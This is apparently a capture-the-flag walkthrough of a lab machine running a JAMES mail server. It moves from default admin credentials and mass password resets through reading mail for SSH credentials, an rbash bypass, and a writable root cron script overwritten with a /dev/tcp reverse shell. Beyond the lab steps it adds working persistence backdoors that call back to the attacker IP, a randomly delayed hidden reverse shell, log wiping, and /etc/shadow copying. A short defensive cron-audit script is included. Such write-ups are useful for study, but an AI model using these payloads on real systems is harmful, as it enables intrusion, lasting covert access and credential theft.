Machine Synopsis
Key Exploitation Techniques:
- JAMES Remote Administration Tool default credentials exploitation
- Email server user enumeration and password manipulation
- Email content analysis for SSH credential discovery
- Restricted shell bypass via SSH command execution
- Cronjob exploitation through writable script overwrite
Reconnaissance & Enumeration
Port Discovery
```
$ nmap -sC -sV -A -p- 10.10.10.51
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.8 [10.10.14.8]), PIPELINING, ENHANCEDSTATUSCODES
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open rsip?
| fingerprint-strings:
| GenericLines:
| JAMES Remote Administration Tool 2.3.2
| Please enter your login and password
| Login id:
| Password:
| Login failed for
|_ Login id:
```
Key Services:
- JAMES Mail Server (SMTP, POP3, NNTP)
- JAMES Remote Administration Tool (port 4555)
- Apache web server
Web Application Analysis
The website shows “Solid State Security” company page with minimal functionality and no obvious attack vectors.
```
# Directory enumeration yields no significant results
$ gobuster dir -u http://10.10.10.51 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```
Exploitation
Default Credential Testing
```
# Connect to JAMES Remote Administration Tool
$ nc -v 10.10.10.51 4555
(UNKNOWN) [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
```
Success: Default credentials root:root provide administrative access.
User Enumeration and Password Reset
```
# List existing mail accounts
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
# Reset all user passwords to 'password'
setpassword james password
Password for james reset
setpassword thomas password
Password for thomas reset
setpassword john password
Password for john reset
setpassword mindy password
Password for mindy reset
setpassword mailadmin password
Password for mailadmin reset
```
Email Content Analysis
POP3 Access and Email Retrieval
```
# Access john's mailbox
$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS password
+OK Welcome john
LIST
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
.
QUIT
```
Credential Discovery in mindy’s Mailbox
```
# Access mindy's mailbox
$ telnet 10.10.10.51 110
USER mindy
+OK
PASS password
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
```
SSH Credentials: mindy:P@55W0rd1!2@
SSH Access and Restricted Shell Bypass
Initial SSH Connection
```
$ ssh mindy@10.10.10.51
mindy@10.10.10.51's password: P@55W0rd1!2@
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ whoami
-rbash: whoami: command not found
mindy@solidstate:~$ id
-rbash: id: command not found
```
Restriction: User is in a restricted bash shell (rbash).
Restricted Shell Bypass
Method 1: SSH Command Execution
```
# Execute commands directly via SSH
$ ssh mindy@10.10.10.51 -t "bash --noprofile"
mindy@10.10.10.51's password: P@55W0rd1!2@
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
```
Method 2: Apache James RCE (Alternative)
```
# Using searchsploit for Apache James exploit
$ searchsploit Apache James Server 2.3.2
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
# Download and modify exploit
$ searchsploit -m 35513
$ python 35513.py 10.10.10.51
# Setup netcat listener
$ nc -nlvp 1234
# Payload executes when user logs into email
# Triggers reverse shell as mindy
# Reverse shell received
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 48670
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
914d0a4ebc177889b5b89a23f556fd75
```
Privilege Escalation
System Enumeration
```
# Transfer LinPEAS for enumeration
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./linpeas.sh
```
Cronjob Discovery
```
# LinPEAS reveals interesting file in /opt
╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x 3 root root 4096 Aug 22 2017 .
drwxr-xr-x 22 root root 4096 Apr 26 2021 ..
drwxr-xr-x 11 root root 4096 Apr 26 2021 james-2.3.2
-rwxrwxrwx 1 root root 105 Aug 22 2017 tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
```
Key Finding: /opt/tmp.py is world-writable (mode 777, owned by root) and appears to be executed periodically.
Process Monitoring
```
# Transfer and run pspy for process monitoring
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./pspy32
# Process execution observed
2022/05/09 04:03:01 CMD: UID=0 PID=1716 | /bin/sh -c python /opt/tmp.py
2022/05/09 04:03:01 CMD: UID=0 PID=1717 | python /opt/tmp.py
```
Confirmation: /opt/tmp.py is executed by root (UID=0) via cronjob.
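A defender-side check for the class of finding above, added here and not part of the original writeup: it parses crontab-style lines such as the `python /opt/tmp.py` entry that pspy revealed and flags any absolute-path target that is world-writable, missing, not owned by the user cron runs it as, or sitting in a world-writable directory without the sticky bit. The crontab text and the two scripts it inspects are a constructed fixture written to a temporary directory; the `run_as_uid` parameter exists only so the fixture can be judged as the current user rather than root.

```python
import os
import re
import stat
import tempfile

# Five schedule fields or an @keyword; tokens starting with "/" in the rest are paths.
CRON_RE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){5})(?P<rest>.+)$")

def insecure_reasons(path, run_as_uid=0):
    """Why a script cron runs as `run_as_uid` could be replaced, if at all."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing target, hijackable if its directory is writable"]
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable file")
    if st.st_uid != run_as_uid:
        reasons.append("owned by uid %d, not the cron user" % st.st_uid)
    pst = os.stat(os.path.dirname(path) or "/")
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        reasons.append("directory world-writable without sticky bit")
    return reasons

def audit_crontab(text, run_as_uid=0):
    """Map each cron line with an unsafe absolute-path target to its reasons."""
    findings = {}
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#") or "=" in tokens[0]:
            continue  # blank line, comment, or VAR=value assignment
        m = CRON_RE.match(line)
        paths = [t for t in m.group("rest").split() if t.startswith("/")] if m else []
        for path in paths:
            reasons = insecure_reasons(path, run_as_uid)
            if reasons:
                findings.setdefault(line.strip(), []).extend(reasons)
    return findings

def demo():
    """Constructed fixture: mode-777 script (the /opt/tmp.py pattern) beside a 755 one."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "tmp.py"), os.path.join(d, "safe.py")
    for p, mode in ((bad, 0o777), (good, 0o755)):
        open(p, "w").close()
        os.chmod(p, mode)
    crontab = "SHELL=/bin/sh\n# m h dom mon dow user command\n"
    crontab += "*/3 * * * * root python %s\n" % bad
    crontab += "*/10 * * * * root python %s\n" % good
    return audit_crontab(crontab, run_as_uid=os.getuid())  # judge as our own uid
```

Run against a real system, `audit_crontab(open("/etc/crontab").read())` with the default `run_as_uid=0` reports only the entries a non-root user could turn into root code execution.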
Cronjob Exploitation
Payload Creation and Deployment
```
# Create Python reverse shell payload
$ cat > py_revshell << 'EOF'
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")
EOF
# Host payload
$ python3 -m http.server 80
# Append payload to tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ curl http://10.10.14.8/py_revshell >> tmp.py
# Verify modification
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")
```
Root Shell Acquisition
```
# Setup netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...
# Wait for cronjob execution
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 40852
root@solidstate:~# whoami
root
root@solidstate:~# cat /root/root.txt
b4c9723a28899b1c45db281d99cc87c9
```
Post-Exploitation Techniques
Persistence Methods
SSH Key Persistence
```
# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f solidstate_persistence
# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys
```
JAMES Mail Server Backdoor
```
# Create mail account for persistence
# echo "adduser backdoor password123" | nc 10.10.10.51 4555
# Modify mail templates for code execution
# cat > /root/apps/james/SAR-INF/config.xml << 'EOF'
# [Include malicious mail processing rules]
# EOF
```
Cron Backdoor Maintenance
```
# Create more sophisticated backdoor
# cat > /opt/system_check.py << 'EOF'
#!/usr/bin/env python
import subprocess
import time
import socket
def check_connection():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect(("10.10.14.8", 4444))
        subprocess.call(["/bin/bash", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
        s.close()
    except:
        pass
check_connection()
EOF
# Add to crontab
# echo "*/10 * * * * /usr/bin/python /opt/system_check.py" >> /etc/crontab
```
Defense Evasion
Mail Server Log Cleanup
```
# Clear JAMES mail logs
# > /root/apps/james/logs/mailet.log
# > /root/apps/james/logs/james.log
# Clear system mail logs
# > /var/log/mail.log
# > /var/log/mail.err
```
Process Hiding
```
# Modify cronjob execution to be less obvious
# cat > /opt/tmp.py << 'EOF'
#!/usr/bin/env python
import os
import sys
import time
import random
# Original cleanup function
try:
    os.system('rm -r /tmp/* ')
except:
    pass
# Hidden backdoor with random delay
time.sleep(random.randint(1, 30))
if random.randint(1, 10) == 5:  # Execute 10% of the time
    os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1' &")
sys.exit()
EOF
```
Lateral Movement Preparation
Email Server Exploitation
```
# Enumerate all mail accounts and passwords
# Connect to JAMES admin tool and extract user list
# Access all mailboxes for credential discovery
# Search for additional systems and credentials in emails
```
Network Discovery
```
# Discover email-related infrastructure
# ss -tlnp | grep -E "(25|110|143|993|995)"
# Scan for internal mail servers
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done
```
Credential Harvesting
```
# Extract mail database if present
# find /root/apps/james -name "*.db" -exec cp {} /tmp/ \;
# Search mail content for credentials
# grep -r "password\|pass\|credential" /root/apps/james/var/mail/
# Extract shadow file
# cp /etc/shadow /tmp/shadow.backup
```
Alternative Exploitation Methods
Direct JAMES Exploitation
```
# Alternative Apache James RCE exploit
$ python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
# Trigger by SSH login as any user
$ ssh mindy@10.10.10.51
```
SMTP Enumeration
```
# SMTP user enumeration
$ smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51
# SMTP relay testing
$ swaks --to test@10.10.10.51 --from test@attacker.com --server 10.10.10.51
```
Alternative Privilege Escalation
Kernel Exploitation
```
# Check kernel version
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux
# Search for applicable exploits
$ searchsploit linux kernel 4.9 | grep -i privilege
```
SUID Binary Analysis
```
# Find SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ find / -perm -4000 -type f 2>/dev/null
# Check for custom SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /usr/local/bin/
```